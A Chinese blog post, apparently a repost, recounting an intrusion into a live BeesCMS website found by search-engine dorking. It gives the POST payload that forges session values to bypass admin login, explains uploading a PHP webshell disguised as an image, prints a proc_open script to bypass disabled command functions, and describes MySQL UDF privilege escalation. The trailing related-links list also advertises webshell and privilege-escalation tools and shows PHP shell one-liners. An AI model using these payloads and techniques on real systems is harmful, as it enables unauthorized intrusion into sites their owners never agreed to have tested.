php挖洞提权,记一次渗透挖洞提权实战

最新推荐文章于 2024-08-13 14:00:00 发布
最新推荐文章于 2024-08-13 14:00:00 发布
阅读量370 收藏 1
点赞数 1
文章标签: php挖洞提权

摘要:这是一次挖掘cms通用漏洞时发现的网站,技术含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收获。

0x01 进入后台

在通过googlehack语法挖掘beescms时发现了这个站点

56cbf256b1a190b571f908385c00e60a.png

利用网上的payload,在/mx_form/mx_form.php?id=12页面使用hackbarPOST以下数据

_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

1

然后访问/admin便可以直接进入后台

0x02 拿shell

进入后台后在‘添加产品模块’处寻找到了上传点

688b4217d7e1d938766c14abbf37c647.png

尝试上马,但提示‘上传图片格式不正确’,于是上传图片马抓包,在repeater里更改后缀为php,然后go

217d14486f3dd570d28a579260bb65d5.png

根据回显没有看出是否上传成功,但也没说失败。经过寻找在‘上传图片管理’处找到

259d52612e11011c343bcfc7a99cfecf.png

点击图片发现解析了,直接菜刀连接,拿到shell

0x03 绕过安全模式

拿到shell后进入终端查看权限,但却发现执行命令失败,可能远程启用了安全模式

c6df44708e2bc1eef546b0e9c9ccf16e.png

经过在网上一番查找得出:要找到未禁用的php执行函数。先上传了一个查看phpinfo的脚本,找到已禁用的函数

2651b120158b4110c38a5189dbdf4612.png

发现proc_open函数未被禁用,于是找到如下php脚本

$descriptorspec=array( //这个索引数组用力指定要用proc_open创建的子进程的描述符

0=>array('pipe','r'), //STDIN

1=>array('pipe','w'),//STDOUT

2=>array('pipe','w') //STDERROR

);

$handle=proc_open('whoami',$descriptorspec,$pipes,NULL);

//$pipes中保存的是子进程创建的管道对应到 PHP 这一端的文件指针($descriptorspec指定的)

if(!is_resource($handle)){

die('proc_open failed');

}

//fwrite($pipes[0],'ipconfig');

print('stdout:
');

while($s=fgets($pipes[1])){

print_r($s);

}

print('===========
stderr:
');

while($s=fgets($pipes[2])){

print_r($s);

}

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($handle);

?>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

上传后可以执行命令,成功绕过安全模式

395d76850431ca1704ab10f8ba8abd91.png

0x04 提权

上图可以看出只是iis权限,能做的事很局限,所以要想办法提权。

菜刀中虽然不能执行命令,但是可以查看文件,于是找到了数据库配置文件

7eab42d2c2e0f7937d33704511b4620c.png

发现是mysql的数据库,想到udf提权,于是上传udf提权脚本(附件中)

ff62e78947f62742c5c63632bc5c9d9b.png

登录后导出udf便可以执行命令了

b09fbbbaa1b5b2c2a7268921031d5473.png

提权成功,但是不可以添加用户,也不能开3389。

结语:希望路过的各位大佬可以指点迷津,也欢迎各位来找我交流探讨,感谢阅读。

参考链接:

PHP限制命令执行绕过https://www.cnblogs.com/R4v3n/articles/9081202.html

作者: PaperPen

来源:先知社区

如有侵权,请联系删除

一点能源
关注
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
110.网络安全渗透测试—[权限提升篇8]—[Windows SqlServer xp_cmdshell存储过程提权]
qwsn
07-05 3396
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,可以开启xp_cmdshell存储过程,以sqlserver的身份执行系统命令。但是不一定是系统权限,还要看管理员在一开始安装sqlserver的权限设置。(1)xp_cmdshell存储过程【存储过程是:已预编译为一个可执行过程的一个或多个SQL语句的集合】,它是用来执行本机的cmd命令的,要求系统登陆有sa权限。默认情况下,sql serve
php提权脚本
05-03
php提权脚本
php挖洞提权,挖洞经验 | 看我如何发现GitHub提权漏洞获得$10000赏金
weixin_33312000的博客
03-09 178
原标题:挖洞经验 | 看我如何发现GitHub提权漏洞获得$10000赏金 之前,我从没参加过GitHub官方的一些漏洞众测项目,在HackerOne发起的HackTheWorld比赛中,主办方宣传除了赏金以外,还有机会获得Github提供的终身无限制私有库(unlimited private repositories)使用权,这激发了我的挖洞兴趣。经过努力,我发现了Github Organiza...
Web 安全 PHP 代码审查之常规漏洞
最新发布
ZL_1618的博客
08-13 617
工欲善其事,必先利其器。我们做代码审计之前选好工具也是十分必要的。下面我给大家介绍两款代码审计中比较好用的工具。功能介绍RIPS 是一款基于 PHP 开发的针对 PHP 代码安全审计的软件。另外,它也是一款开源软件,由国外安全研究员 Johannes Dahse 开发,程序只有 450KB,目前能下载到的最新版是0.55。在写这段文字之前笔者特意读过它的源码,它最大的亮点在于调用了 PHP 内置解析器接口。
php服务器提权,服务器提权
weixin_27945229的博客
03-13 495
当拿到WebShell 之后,下⼀步⼲什么?权限提升通过一些最初的漏洞利⽤途径,攻击者将获得⼀定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得⽐最初更多的权限,以期望从其他账户访问敏感信息,甚⾄获得对整个系统的完全管理控制。当攻击者以这种⽅式扩⼤其最初的未经授权访问的权限时,将其⾏为称为权限提升攻击。简单来说,就是获取⽐最初更多的权限,甚⾄系统权限。⽔平权限提升(越权)我们假设攻击者已经获得...
PHP提权姿势
她叫常玉莹
09-08 3314
ShellCommandReverse ShellFile uploadFile downloadSUIDSudoCapabilities Shell export CMD="/bin/sh" php -r 'system(getenv("CMD"));' export CMD="/bin/sh" php -r 'passthru(getenv("CMD"));' export CMD="/bin/sh" php -r 'print(shell_exec(getenv("CMD")));' expo.
php注入后的提权
weixin_34327761的博客
11-29 828
方法一:爆破法. 最显眼的要属用户名和密码了,关键是如何破密码呢?到网上搜了一个专门破SERV-U密码的工具(Serv-UPassCrack1.0a.rar),太慢了,这要等到何年何月啊!干脆用事本打开它的脚本crack.vbs.看看解密原理:假设原来明文密码用"password_mingwen"表示,密文密码也就是 我们在ServUDaemon.ini中看到...
php提权,一次实战提权
weixin_39996096的博客
03-10 1207
原标题:一次实战提权闲来没事,朋友发给我一个站,需要提权,然后那就试试吧,于是就有了接下来的文章,大牛勿喷https://xxxxxx/……/Abstract.aspx(地址不方便公布)猜测:已经上了一个aspx的大马,看来支持aspx那就可能有mssql环境,可能开放了1433,待会可以利用sa提权等等有关mssql的提权方法: 然后打开访问看看: 熟悉的界面,那我们先来搜集一下基本信息: 从这...
实战渗透-一次拿到webshell后艰难的提权
qq_29437513的博客
07-25 2121
上一篇,拿到webhshell后,数据库是dba, 本地上传一个cmd.exe组件上去后,执行失败 网上很多说改路径,写的也写不明白,想到之前迪哥用过的大马提权, 环境是php,但支持asp,有iis组件, 发现 D://recycle可写,传一个cmd.com组件执行命令 权限真的很小,是 nt service 网络用户权限,ns的权限是不能执行net的 支持的组件,提权的时候用的找 ===================== 查看systeminfo,发现有200多个补丁,准备打溢出,目标机是可以
php网站渗透实战_【案例分析】一次综合靶场实战渗透
weixin_39981360的博客
12-19 832
原标题:【案例分析】一次综合靶场实战渗透时间有点久,这里主要和大家分享一下思路。该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网。开始渗透首先进入靶场开放的唯一一个开放的web端。进入网站首页,发现是Mallbuilder,并且该版本有注入漏洞,可以直接获取管理员密码。payload:/cate_show_ajax.php?oper=ajax& call=get...
PHP提权功能强大的大马。星外提权。使用时最好修改一下自己的密码。
09-11
提权功能强大,星外 PHP提权功能强大的大马。星外提权。使用时最好修改一下自己的密码。
超强php提权大马!过免杀代码
06-14
超强php提权大马!过免杀 代码
PHPwebshell提权源码
08-07
PHPwebshell提权源码 集合控制台 网路 链接 账户 打包 修改文件
PHP入侵+提权拿服务器.rar
12-03
PHP入侵+提权拿服务器.rarPHP入侵+提权拿服务器.rar
103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]
qwsn
02-15 7249
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞提权 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的提权exp (7)进行提权 (8)切换shell
php执行权限提权,PHP提权之异步执行
weixin_39602976的博客
03-18 398
在服务器上都会定时运行一些脚本以完成周期性的任务.而这些脚本往往是以root权限启动的,替换或者改变其中的内容就可以完成提权.而今天在这要讲解的就是php提权中的异步执行方法.在php中一般大家都用下面四个函数来调用系统命令,或者外部程序:echo exec("dir");echo shell_exec("dir");echo system("dir");echo passthru("dir"...
一次渗透挖洞提权实战
weixin_43639741的博客
06-10 2800
摘要:这是一次挖掘cms通用漏洞时发现的网站,技术含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收获。 0x01 进入后台 在通过googlehack语法挖掘beescms时发现了这个站点 利用网上的payload,在/mx_form/mx_form.php?id=12页面使用hackbarPOST以下数据 _SESSION[login_in]=1&_SESSION...
PHP代码审计入门(SQL注入漏洞挖掘基础)
2301_77512689的博客
04-23 297
SQL注入经常出现在登陆页面、和获取HTTP头(user-agent/client-ip等)、订单处理等地方,因为这几个地方是业务相对复杂的,登陆页面的注入现在来说大多数是发生在HTTP头里面的client-ip和x-forward-for。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值